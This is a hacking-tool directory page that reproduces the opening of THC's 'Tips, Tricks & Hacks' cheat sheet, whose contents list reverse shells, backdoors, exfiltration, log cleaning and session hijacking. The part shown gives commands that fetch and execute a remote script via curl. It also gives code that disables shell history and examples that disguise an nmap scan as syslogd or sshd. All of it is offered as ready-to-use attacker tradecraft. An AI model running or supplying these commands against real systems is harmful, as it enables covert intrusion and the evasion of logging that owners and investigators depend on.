Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
thc-tips-tricks-hacks-cheat-sheet — Various tips & tricks | Kitploit
Tools/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Open Source Intelligence)Persistence MechanismsLateral MovementData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingRed TeamingCurated Resources

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Payload Development
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Various tips & tricks

View Repository
3.9k471553 months agoReviewed by Kitploit

THC's favourite Tips, Tricks & Hacks (Cheat Sheet)

https://thc.org/tips

A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.

We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.

Got tricks? Join us https://thc.org/ops

  1. Bash
    1. Set up a Hack Shell
    2. Hide your commands
    3. Hide your command line options
    4. Hide a network connection
    5. Hide a process as user
    6. Hide a process as root
    7. Hide scripts
    8. Hide from cat
    9. Execute in parallel with separate logfiles
  2. SSH
    1. Almost invisible SSH
    2. Multiple shells via 1 SSH/TCP connection
    3. SSH tunnel
    4. SSH socks5 tunnel
    5. SSH to NATed host
    6. SSH pivot via ProxyJump
    7. SSHD as user
  3. Network
    1. Discover hosts
    2. Tcpdump
    3. Tunnel and forwarding
      1. Raw TCP reverse ports
      2. HTTPS reverse forwards
      3. Bouncing traffic with iptables
      4. Ghost IP / IP Spoofing
      5. Various
    4. Use any tool via Socks Proxy
    5. Find your public IP address
    6. Check reachability from around the world
    7. Check/Scan Open Ports
    8. Crack Passwords hashes
    9. Brute Force Passwords / Keys
  4. Data Upload/Download/Exfil
    1. File Encoding/Decoding
    2. File transfer using cut & paste
    3. File transfer using tmux
    4. File transfer using screen
    5. File transfer using gs-netcat and sftp
    6. File transfer using HTTP
    7. File download without curl
    8. File transfer using rsync
    9. File transfer to public dump sites
    10. File transfer using WebDAV
    11. File transfer to Telegram
  5. Reverse Shell / Dumb Shell
    1. Reverse Shells
      1. with gs-netcat (encrypted)
      2. with Bash
      3. with cURL (encrypted)
      4. with cURL (cleartext)
      5. with OpenSSL (encrypted)
      6. with remote.moe (encrypted)
      7. without /dev/tcp
      8. with Python
      9. with Perl
      10. with PHP
    2. Upgrading the dumb shell
      1. Upgrade a reverse shell to a pty shell
      2. Upgrade a reverse shell to a fully interactive shell
      3. Reverse shell with socat (fully interactive)
  6. Backdoors
    1. gs-netcat
    2. sshx.io
    3. Smallest SSHD backdoor
    4. Remote access an entire network
    5. Smallest PHP backdoor
    6. Smallest reverse DNS-tunnel backdoor
    7. Local Root backdoor
    8. Self-extracting implant
  7. Host Recon
  8. Shell Hacks
    1. Shred files (secure delete)
    2. Restore the date of a file
    3. Clean logfile
    4. Hide files from a User without root privileges
    5. Make a file immutable
    6. Change user without sudo/su
    7. Obfuscate and crypt payload
    8. Deploying a backdoor without touching the file-system
  9. Crypto
    1. Generate quick random Password
    2. Linux transportable encrypted filesystems
      1. cryptsetup
      2. EncFS
    3. Encrypting a file
  10. Session sniffing and hijacking
    1. Sniff a user's SHELL session
    2. Sniff all SHELL sessions with dtrace
    3. Sniff all SHELL sessions with eBPF
    4. Sniff a user's SSH or SSHD session with strace
    5. Sniff a user's outgoing SSH session with a wrapper script
    6. Sniff a user's outgoing SSH session with SSH-IT
    7. Hijack / Take-over a running SSH session
  11. VPN and Shells
    1. Disposable Root Servers
    2. VPN/VPS Providers
  12. OSINT Intelligence Gathering
  13. Miscellaneous
    1. Tools of the trade
    2. Cool Linux commands
    3. tmux Cheat Sheet
    4. Useful commands
  14. How to become a Hacker
  15. Other Sites

1. Bash / Shell

1.i. Set up a Hack Shell (bash):

Make BASH less noisy. Disables ~/.bash_history and many other things.

 source <(curl -SsfL https://thc.org/hs)

Alternative URL:

 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

And if there is no curl/wget, use surl and (temporarily) installed curl with bin curl.

source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)
# Afterwards type `bin curl` to (temporarily) install curl (in memory).

HackShell does much more but most importantly this:

unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

We use anew a lot, and this is a quick workaround:

xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; }
which anew &>/dev/null || alias anew=xanew

Bonus tip: Any command starting with a " " (space) will not get logged to history either.

$  id

1.ii. Hide your command / Daemonzie your command

This will hide the process name only. Use zapper to also hide the command line options.

(exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'

Start a background 'nmap' hidden as '/usr/sbin/sshd':

(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)
Download Tool